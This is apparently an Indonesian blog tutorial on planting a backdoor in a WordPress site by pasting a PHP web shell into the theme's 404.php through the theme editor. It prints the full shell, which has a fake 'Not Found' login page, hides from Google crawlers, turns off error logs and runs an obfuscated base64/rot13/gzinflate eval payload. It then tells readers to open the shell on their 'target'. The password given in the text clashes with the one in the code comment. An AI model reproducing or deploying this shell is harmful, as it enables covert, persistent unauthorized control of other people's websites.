Sementara Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). ( Dikutip dari Wikipedia.Org )
* Bantu saya untuk mengembangkan blog ini menjadi lebih baik dengan mengklik Google Adsense atau Iklan yang ada di atas posting, dan atau disebelah kiri atas posting. 1 klik sangat berharga bagi saya dan bernilai $0.01 - $1 per kliknya.
Cara Mengupload Shell ( Backdoor ) di Wordpress:
1. Login ke Dashboard Wordpress
Gambar 1: Dashboard Wordpress
2. Klik Appearance
Gambar 2: Dashboard Wordpress
3. Klik Themes
Gambar 3: Appearance
4. Klik Editor
Gambar 4: Themes Editor
5. Klik 404 Template atau 404.php
* Jika tidak ada 404 Template atau 404.php, anda bisa menggunakan Comments atau comments.php atau juga yang lainnya.
Gambar 5: Themes Editor
6. Ganti script 404.php dengan script shell ( Backdoor ) anda, jika
anda belum punya script backdoor copy aja script dibawah ini lalu klik
tombol Update File.<?php/* (1n73ction shell v3.2 by x'1n73ct|default pass:" 12345 ") */$auth_pass = "827ccb0eea8a706c4c34a16891f84e7b";$color = "#00ff00";$default_action = 'FilesMan';@define('SELF_PATH', __FILE__);if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {header('HTTP/1.0 404 Not Found');exit;}@session_start();@error_reporting(0);@ini_set('error_log',NULL);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);@ini_set('display_errors', 0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define('VERSION', '2.1');if( get_magic_quotes_gpc() ) {function stripslashes_array($array) {return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);}$_POST = stripslashes_array($_POST);}function printLogin() {?><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address><style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style><center><form method=post><input type=password name=pass></form></center><?phpexit;}if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))if( empty( $auth_pass ) ||( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;elseprintLogin();@ini_set('output_buffering',0);@ini_set('display_errors', 0);function x($inject){eval("\$z=gz" . "inf" . "la" . "te(s" . "t" . "r_r" . "ot" . "13(ba" . "se" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "de(st" . "r" . "_" . "r" . "o" . "t" . "13(" . "gzi" . "nf" . "lat" . "e(" . "bas" . "e6" . "4_d" . "ec" . "ode(\$inject))))));eval(\$z);");}x("DczdFkIwAADgB3Kx4+f4uehiJyJFM0bcjYPKqGbFPH19D/Adch2iLn+Qan8XlupmvkrlMEVX3NtyDS2gc9nTGF4X0yHDKSAFnPHHOkwhFNw5v0XIqMdyAylyc5r0ReRkzlhmX8y5Fizfz5rpiQsaz7jdWXZDUbJdcN2KqfRPLWnrJ6t88P9SpB5TNIws6KCxxSXvo3EugK2kQKNA2M66mLG72/0A");?>
http://targetmu.com/wp-content/themes/nama themes/404.php
Lihat pada Gambar 6, jika nama themesnya twentyfourteen. Berarti kita panggil shellnya seperti di bawah ini:http://targetmu.com/wp-content/themes/twentyfourteen/404.php
Gambar 7: Shell
8. Masukan password shell. "Jika anda menggunakan password"
jika anda menggunakan shell yang saya berikan tadi, berarti password shellnya adalah scupeid .
Gambar 8: Sukses
Tidak ada komentar:
Posting Komentar
Jika Ada Yang Kurang Paham, Silahkan Berkomentar Dengan Sopan & Dapat Di Mengerti..